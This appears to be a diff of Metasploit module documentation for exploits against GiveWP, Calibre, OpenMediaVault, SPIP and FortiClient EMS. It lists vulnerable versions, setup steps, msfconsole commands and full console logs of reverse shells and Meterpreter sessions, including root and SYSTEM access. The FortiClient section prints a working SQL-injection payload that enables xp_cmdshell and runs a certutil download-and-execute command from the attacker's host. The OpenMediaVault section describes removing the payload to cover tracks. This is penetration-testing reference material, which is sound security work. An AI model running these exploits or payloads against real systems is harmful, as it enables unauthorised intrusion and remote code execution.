+```
+- Access the WordPress instance at `http://localhost` and activate the GiveWP plugin via the admin dashboard.
+
+1. **Create a Donation Form**:
+  - Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
+  - Select any form.
+  - Configure the form as needed, publish it.
+
+## Options
+
+No specific options need to be configured.
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Use the module with `use exploit/multi/http/wp_givewp_rce`.
+3. Set `RHOSTS`, `RPORT`, and the necessary WordPress-specific options.
+4. Run the exploit.
+5. Gain a Meterpreter session.
+
+## Scenarios
+
+### GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.3.2)
+
+Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```bash
+msf6 > use exploit/multi/http/wp_givewp_rce 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.3.2
+[+] Detected GiveWP Plugin version: 3.14.1
+[+] The target appears to be vulnerable.
+[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
+[*] Using Form ID: 13 for exploitation.
+[*] Sending stage (3045380 bytes) to 172.24.0.3
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200
+
+meterpreter > sysinfo 
+Computer     : 172.24.0.3
+OS           : Debian 11.8 (Linux 5.15.0-119-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a vulnerability in Calibre <= v6.9.0 - v7.15.0 (CVE-2024-6782).
+
+An unauthenticated remote attacker can exploit this vulnerability to gain arbitrary code execution in the context of which Calibre is being
+executed.
+
+All versions between v6.9.0 - v7.15.0 are affected. STAR Labs published [an advisory](https://starlabs.sg/advisories/24/24-6782/) that
+includes the root cause analysis and a proof-of-concept.
+
+**Vulnerable Application Installation**
+
+Calibre can be downloaded from [here](https://download.calibre-ebook.com/).
+
+**Successfully tested on**
+
+Windows:
+- Calibre v7.15 on Windows 10 22H2
+- Calibre v7.14 on Windows 10 22H2
+- Calibre v7.0 on Windows 10 22H2
+- Calibre v6.29 on Windows 10 22H2
+- Calibre v6.9 on Windows 10 22H2
+
+Linux:
+- Calibre v7.15 on Ubuntu 24.04 LTS
+- Calibre v7.14 on Ubuntu 24.04 LTS
+- Calibre v7.0 on Ubuntu 24.04 LTS
+- Calibre v6.29 on Ubuntu 24.04 LTS
+- Calibre v6.9 on Ubuntu 24.04 LTS
+
+## Verification Steps
+
+1. Install Calibre
+2. Start Calibre and click Connect/share > Start Content server
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/multi/misc/calibre_exec
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/misc/calibre_exec) > set RHOSTS <IP>
+msf6 exploit(multi/misc/calibre_exec) > set LHOST <IP>
+msf6 exploit(multi/misc/calibre_exec) > exploit
+```
+
+You should get a meterpreter session running in the same context as the Calibre application.
+
+## Scenarios
+
+**Windows**
+
+Running the exploit against Calibre v7.14 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(multi/misc/calibre_exec) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending payload...
+[*] Sending stage (201798 bytes) to 192.168.137.194
+[*] Meterpreter session 1 opened (192.168.137.190:4444 -> 192.168.137.194:50346) at 2024-08-01 23:28:16 -0400
+[*] Exploit finished, check thy shell.
+
+meterpreter > sysinfo
+Computer        : DESKTOP-foo
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > shell
+Process 6084 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Calibre2>whoami
+whoami
+desktop-foo\admin
+```
+
+**Linux**
+
+Running the exploit against Calibre v7.14 on Ubuntu 24.04 LTS, using cmd/unix/python/meterpreter/reverse_tcp as a payload, should result in
+an output similar to the following:
+
+```
+msf6 exploit(multi/misc/calibre_exec) > exploit 
+
+[ *] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending payload...
+[*] Sending stage (24772 bytes) to 192.168.137.195
+[*] Meterpreter session 2 opened (192.168.137.190:4444 -> 192.168.137.195:52376) at 2024-08-01 23:40:16 -0400
+
+meterpreter > sysinfo
+Computer        : asdfvm
+OS              : Linux 6.8.0-39-generic #39-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul  5 21:49:14 UTC 2024
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+```
@@ -0,0 +1,281 @@
+## Vulnerable Application
+
+This is a new module addressing an old vulnerability in OpenMediaVault, an open-source NAS solution.
+The vulnerability exists within all OpenMediaVault versions starting from from `0.1` until the recent release `7.4.2-2`
+and it allows an authenticated user to create cron jobs as root on the system.
+An attacker can abuse this by sending a POST request via `rpc.php` to schedule and execute a cron entry
+that runs arbitrary commands as root on the system.
+
+The following releases were tested.
+
+**OpenMediaVault x64 appliances:**
+* openmediavault_0.2_amd64.iso
+* openmediavault_0.2.5_amd64.iso
+* openmediavault_0.3_amd64.iso
+* openmediavault_0.4_amd64.iso
+* openmediavault_0.4.32_amd64.iso
+* openmediavault_0.5.0.24_amd64.iso
+* openmediavault_0.5.48_amd64.iso
+* openmediavault_1.9_amd64.iso
+* openmediavault_2.0.13_amd64.iso
+* openmediavault_2.1_amd64.iso
+* openmediavault_3.0.2-amd64.iso
+* openmediavault_3.0.26-amd64.iso
+* openmediavault_3.0.74-amd64.iso
+* openmediavault_4.0.9-amd64.iso
+* openmediavault_4.1.3-amd64.iso
+* openmediavault_5.0.5-amd64.iso
+* openmediavault_5.5.11-amd64.iso
+* openmediavault_5.6.13-amd64.iso
+* openmediavault_6.0-16-amd64.iso
+* openmediavault_6.0-34-amd64.iso
+* openmediavault_6.0-amd64.iso
+* openmediavault_6.0.24-amd64.iso
+* openmediavault_6.5.0-amd64.iso
+* openmediavault_7.0-20-amd64.iso
+* openmediavault_7.0-32-amd64.iso
+
+**ARM64 on Raspberry PI running Kali Linux 2024-3:**
+* openmediavault 7.3.0-5
+* openmediavault 7.4.2-2
+
+**VirtualBox Images (x64):**
+* openmediavault 0.4.24
+* openmediavault 0.5.30
+* openmediavault 1.0.21
+
+## Installation steps to install OpenMediaVault NAS appliance
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the OpenMediaVault iso images from [here](https://sourceforge.net/projects/openmediavault/files/iso/).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the OpenMediaVault appliance.
+* Either thru the console, `ssh` on port `22` or using the `webui` via `http://your_openmediavault_ip`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/unix/webapp/openmediavault_auth_cron_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is required and is the username (default: admin) to authenticate with the application.
+
+### PASSWORD
+This option is required and is the password (default: openmediavault) in plain text to authenticate with the application.
+
+### PERSISTENT
+This option keeps the payload persistent in Cron and runs every minute. Warning: This is a noisy option for detection.
+The default value is false, where the payload is removed to cover your tracks.
+
+## Scenarios
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > info
+
+       Name: OpenMediaVault rpc.php Authenticated Cron Remote Code Execution
+     Module: exploit/unix/webapp/openmediavault_auth_cron_rce
+   Platform: Unix, Linux
+       Arch: cmd, x86, x64, armle, aarch64
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-05-08
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Brandon Perry <bperry.volatile@gmail.com>
+  Mert BENADAM
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  PASSWORD   openmediavault   yes       The OpenMediaVault password to authenticate with
+  PERSISTENT  false           yes       Keep the payload persistent in Cron. Default value is false, where the payload is removed
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  USERNAME   admin            yes       The OpenMediaVault username to authenticate with
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
+                                      n on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
+  An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
+  a cron entry that runs arbitrary commands as root on the system.
+  All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2013-3632
+  https://packetstormsecurity.com/files/178526
+  https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632
+
+
+View the full module info with the info -d command.
+```
+### openmediavault_7.0-32-amd64.iso appliance Unix command - cmd/unix/reverse_bash
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > check
+
+[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] 192.168.201.6:80 - The target is vulnerable. Version 7.0.pre.32
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target is vulnerable. Version 7.0.pre.32
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[+] Cron payload entry successfully removed.
+[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60814) at 2024-07-03 12:47:54 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux openmediavault 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
+exit
+```
+### openmediavault_7.0-32-amd64.iso appliance Linux Dropper -  linux/x64/meterpreter/reverse_tcp
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1
+target => 1
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target is vulnerable. Version 7.0.pre.32
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/cYSPpwJI3FXafxL
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Client 192.168.201.6 (Wget/1.21.3) requested /cYSPpwJI3FXafxL
+[*] Sending payload to 192.168.201.6 (Wget/1.21.3)
+[*] Sending stage (3045380 bytes) to 192.168.201.6
+[+] Cron payload entry successfully removed.
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.6:44398) at 2024-07-03 12:53:49 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : openmediavault.local
+OS           : Debian 12.5 (Linux 6.1.0-18-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+###  openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Unix command - cmd/unix/reverse_bash
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 0
+target => 0
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
+rhosts => 192.168.1.10
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
+lhost => 192.168.1.8
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target appears to be vulnerable. Version 7.3.0.pre.5
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[+] Cron payload entry successfully removed.
+[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-01 20:14:07 +0000
+
+pwd
+/root
+uname -a
+Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
+```
+###  openmediavault 7.3.0-5 ARM64 Raspberry PI-4  Linux Dropper -  linux/aarch64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1
+target => 1
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
+rhosts => 192.168.1.10
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
+lhost => 192.168.1.8
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating with OpenMediaVault using credentials admin:openmediavault
+[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
+[+] The target appears to be vulnerable. Version 7.3.0.pre.5
+[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/DdVzoLQugqto82
+[+] Cron payload execution triggered. Wait at least 1 minute for the session to be established.
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Client 192.168.201.10 (Wget/1.21.4) requested /DdVzoLQugqto82
+[*] Sending payload to 192.168.201.10 (Wget/1.21.4)
+[+] Cron payload entry successfully removed.
+[*] Meterpreter session 9 opened (192.168.201.8:4444 -> 192.168.201.10:36792) at 2024-07-01 20:22:02 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+## Limitations
+Ensure that your `WfsDelay` advanced option is set to more then 60 seconds to allow `cron` to execute the payload.
@@ -1,190 +0,0 @@
-## Vulnerable Application
-
-This module exploits a PHP code injection in SPIP. The vulnerability exists in
-the `oubli` parameter and allows an unauthenticated user to execute arbitrary
-commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
-concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
-
-The module's `check` method attempts to obtain the SPIP version via a simple HTTP GET request to `/spip.php`
-page and fingerprints it either via the `generator` meta tag, or by the
-`Composed-By` header.
-
-This module has been successfully tested against SPIP version 4.0.0.
-
-## Setup
-
-On Ubuntu 20.04, download a vulnerable instance of SPIP:
-
-```
-wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
-```
-
-Unzip it to a specific folder:
-
-```
-mkdir spip-site 
-cp spip-v4.2.0.zip spip-site/ 
-cd spip-site / 
-unzip spip-v4.2.0.zip
-```
-
-Install php and the necessary extensions:
-
-```
-sudo apt install -y php-xml php-zip php-sqlite3
-```
-
-Serve the application (while in the newly created spip-site directory):
-
-```
-php -S 127.0.0.1:8000
-```
-
-Navigate to the following URL, select `sqlite` for the database, and complete the installation:
-
-```
-http://127.0.0.1:8000/ecrire/
-```
-
-## Verification Steps
-
-1. Start msfconsole
-2. Do: `use exploit/unix/webapp/spip_rce_form`
-3. Do: `set RHOSTS [IP]`
-4. Do: `set LHOST [IP]`
-5. Do: `exploit`
-
-## Options
-### TARGETURI
-The base path to PIP. The default value is `/`.
-
-## Targets
-
-### 0 (Linux Dropper)
-
-This uses a Linux dropper to execute code.
-
-### 1 (Unix Command)
-
-This executes a Unix command.
-
-## Scenarios
-### SPIP 4.0.0 - Linux target - PHP In-Memory
-```
-
-Module options (exploit/unix/webapp/spip_rce_form):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT      8080             yes       The target port (TCP)
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                yes       The base path to SPIP application
-   VHOST                       no        HTTP server virtual host
-
-
-Payload options (php/exec):
-
-   Name  Current Setting       Required  Description
-   ----  ---------------       --------  -----------
-   CMD   touch /tmp/pwned.txt  yes       The command string to execute
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-=>  0   Automatic (PHP In-Memory)
-
-
-
-View the full module info with the info, or info -d command.
-
-msf6 exploit(unix/webapp/spip_rce_form) > run
-
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] SPIP Version detected: 4.0.0
-[+] The target appears to be vulnerable.
-[*] Got anti-csrf token: fDBVRjMENBhztAcYFvRr+49sl+fSbkKWDtcOmHtIo0Ta5iJ1MNTCax9uYvLZYlhtD77tZ0TcgnhyRwE=
-[*] 127.0.0.1:8080 - Attempting to exploit...
-[*] Exploit completed, but no session was created.
-
-rw-rw-rw- 1 jvoisin jvoisin 0 Feb 28 20:45 /tmp/pwned.txt
-msf6 exploit(unix/webapp/spip_rce_form) > 
-```
-
-### SPIP 4.0.0 - Linux target - UNIX In-Memory
-
-```
-msf6 exploit(unix/webapp/spip_rce_form) > options 
-
-Module options (exploit/unix/webapp/spip_rce_form):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT      8080             yes       The target port (TCP)
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /                yes       The base path to SPIP application
-   URIPATH                     no        The URI to use for this exploit (default is random)
-   VHOST                       no        HTTP server virtual host
-
-
-   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT  8080             yes       The local port to listen on.
-
-
-Payload options (cmd/unix/reverse_openssl):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  localhost        yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Automatic (Unix In-Memory)
-
-
-View the full module info with the info, or info -d command.
-
-msf6 exploit(unix/webapp/spip_rce_form) > set payload cmd/unix/reverse_openssl
-payload => cmd/unix/reverse_openssl
-msf6 exploit(unix/webapp/spip_rce_form) > run
-
-[!] You are binding to a loopback address by setting LHOST to ::1. Did you want ReverseListenerBindAddress?
-[*] Started reverse double SSL handler on ::1:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] SPIP Version detected: 4.0.0
-[+] The target appears to be vulnerable.
-[*] Got anti-csrf token: fDBVRjMENBhztAcYFvRr+49sl+fSbkKWDtcOmHtIo0Ta5iJ1MNTCax9uYvLZYlhtD77tZ0TcgnhyRwE=
-[*] 127.0.0.1:8080 - Attempting to exploit...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo v5zOS2N6c977VY0X;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "v5zOS2N6c977VY0X\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 2 opened (::1:4444 -> ::1:38048) at 2023-04-10 21:30:25 +0200
-^Z
-Background session 1? [y/N]  y
-msf6 exploit(unix/webapp/spip_rce_form) > sessions -i 2 -c whoami
-[*] Running 'whoami' on shell session 2 (127.0.0.1)
-jvoisin
-
-msf6 exploit(unix/webapp/spip_rce_form) >
-```
@@ -71,7 +71,7 @@ and download and install the .msi package. Once installed correctly you should s
 1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`

 ## Scenarios
-### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
+### FortiClientEndpointManagementServer_7.0.7.0398_x64.exe running on Windows Server 2019 (Domain Controller)
 ```
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
 rhosts => 172.16.199.200
@@ -101,7 +101,7 @@ Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
-   LPORT               8383             yes       The listen port
+   LPORT               4444             yes       The listen port


 Exploit target:
@@ -114,32 +114,156 @@ Exploit target:

 View the full module info with the info, or info -d command.

-msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
+verbose => true
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
 [*] Reloading module...

-[*] Started reverse TCP handler on 172.16.199.1:8383
+[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\pzGnmDqDGUOb.exe & start /B %TEMP%\pzGnmDqDGUOb.exe
+[*] Fetch handler listening on 172.16.199.1:8080
+[*] HTTP server started
+[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
+[*] Started reverse TCP handler on 172.16.199.1:4444
 [*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
-[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
+SIZE=    124
+X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
+X-FCCK-PROBE-END
+
+
+[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
+
+[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.0.7
+[*] 172.16.199.200:8013 - Returning SYSINFO for 7.0 target
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;--
+SIZE=     1900
+
+X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjA4NzkKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9QjRGNDQ1MEQtMTA4NS00RUIyLTkzMzItRkNCMDVFNzExRDE3Ck5XSUZTPUV0aGVybmV0MHwyMC4xNTQuOS40fGM0OmZjOjEyOmIzOjI3OmVmfDIxOS4xMDIuMzYuMjIwfGExOjhjOmJjOjBjOjJmOmE5fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTMwLTUwLTAtNTAwCkdST1VQX1RBRz0KQURHVUlEPQpFUF9GR1RDSEtTVU09MApFUF9SVUxFQ0hLU1VNPTAKV0ZfRklMRVNDSEtTVU09MApFUF9BUFBDVFJMQ0hLU1VNPTAK
+
+X-FCCK-REGISTER-END
+
+
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
 [*] Sending stage (201798 bytes) to 172.16.199.200
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
-726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
-54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
-[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
+[*] 172.16.199.200:8013 - The response received was:
